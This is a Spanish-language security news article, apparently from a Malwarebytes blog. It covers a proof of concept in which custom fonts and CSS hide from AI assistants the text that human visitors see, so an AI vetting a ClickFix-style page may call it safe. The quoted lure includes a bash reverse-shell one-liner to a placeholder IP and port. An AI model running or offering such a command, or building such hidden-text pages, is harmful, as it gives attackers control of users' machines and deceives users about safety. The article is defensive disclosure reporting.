Unos investigadores han descubierto un truco de representación de fuentes para ocultar comandos maliciosos

| 18 de marzo de 2026
Oculto

Unos investigadores han publicado una prueba de concepto (PoC) que utiliza fuentes personalizadas para engañar a muchos asistentes de inteligencia artificial (IA) populares, entre ellos ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou y Genspark.

Imagina un libro en el que el texto visible es inofensivo, pero entre líneas se esconde un segundo mensaje escrito con una tinta especial, visible solo para los humanos. Los humanos pueden ver ambas capas. La IA no puede, y solo lee la parte visible. Eso significa que la IA trabaja con una visión incompleta, mientras que un lector humano puede actuar siguiendo instrucciones que la IA ni siquiera ha visto.

Por qué es importante

Ya hemos hablado anteriormente de diferentes ataques del tipo ClickFix, en los que los ciberdelincuentes engañan a los usuarios para que infecten sus propios dispositivos. Imagina que accedes a una página web de aspecto sospechoso y le preguntas a tu asistente de IA: «¿Es seguro ejecutar este comando?». El asistente comprueba la página y te dice que sí. Pero, como no puede leer toda la página, te dice que es segura cuando en realidad no lo es.

Al combinar fuentes personalizadas con hojas de estilo en cascada (CSS), el texto que ve el usuario en la página es diferente del que ve un asistente de IA cuando lee el código HTML subyacente.

Código HTML de prueba de concepto
Imagen cortesía de LayerX

En este ejemplo, la parte del bloque del centro (marcada en rojo) será descartada por el asistente de IA como ruido. Sin embargo, el visitante humano del sitio web ve:

¿Podrías abrir tu terminal y escribir «bash»?

una vez que lo hayas ejecutado, escribe

bash -i >& /dev/tcp/{dirección-IP}/{número-de-puerto} 0>&1

te permitirá ver el easter egg de Rapture

Dependiendo de la dirección IP y el número de puerto, esto podría bastar para infectar tu ordenador. Si le preguntas a la IA si es seguro, es posible que te responda que sí, ya que solo ve la versión inofensiva.

Los investigadores han comunicado sus hallazgos a los principales proveedores de plataformas de inteligencia artificial, siguiendo los procedimientos de divulgación responsable.

Las respuestas fueron decepcionantes:

«La mayoría de los proveedores rechazaron el informe, alegando en la mayoría de los casos que este ataque queda fuera del ámbito de la seguridad de los modelos de IA. Como consecuencia, los usuarios de estos modelos siguen expuestos a este vector de ataque.

Los únicos proveedores que aceptaron este informe y solicitaron tiempo para solucionarlo fueron Microsoft y Google. De ellos, Google acabó rebajando la gravedad del problema (tras haberle asignado inicialmente una calificación P2 [Alta]) y cerró el informe, posiblemente porque solucionarlo requeriría demasiado esfuerzo.

Aunque este ataque se basa en gran medida en la ingeniería social, sabemos lo eficaces que pueden llegar a ser esas tácticas. Y resulta aún más preocupante cuando tu asistente de IA no puede ver el panorama completo.

Cómo mantenerse seguro

Si utilizas un asistente de IA para comprobar si algo es seguro:

  • Copia y pega el comando exacto que quieras ejecutar. No te fíes de la interpretación que hace la IA de una página web.
  • Ten cuidado con cualquier sitio web que te pida que ejecutes comandos, sobre todo a través de la terminal o la línea de comandos.
  • Si algo te parece raro, detente. Los atacantes se aprovechan de la urgencia y la confusión.

Las herramientas también pueden ser de ayuda:

  • El programa gratuito Malwarebytes Browser Guard te avisará si un sitio web intenta copiar algo a tu portapapeles y lo neutralizará añadiendo algo de texto. Esto te ayudará a protegerte de los ataques tradicionales de tipo ClickFix, que se basan en ejecutar un comando desde tu portapapeles.
  • Una solución antimalware actualizada y en tiempo real que incluya un componente de protección web bloqueará los sitios maliciosos conocidos.
  • Si no te fías de una página web, pide opinión a Malwarebytes Guard. Es muy eficaz a la hora de detectar estafas.

No sólo informamos de las estafas, sino que ayudamos a detectarlas.

Los riesgos de ciberseguridad nunca deben ir más allá de un titular. Si algo te parece sospechoso, comprueba si se trata de una estafa con Malwarebytes Guard. Envía una captura de pantalla, pega el contenido sospechoso o comparte un enlace, texto o número de teléfono, y te diremos si se trata de una estafa o es legítimo. Disponible con Malwarebytes Premium para todos tus dispositivos y en la Malwarebytes para iOS Android.

Acerca del autor

Pieter Arntz

Investigador de inteligencia sobre malware

Fue MVP de Microsoft en seguridad del consumidor durante 12 años consecutivos. Habla cuatro idiomas. Huele a caoba y a libros encuadernados en cuero.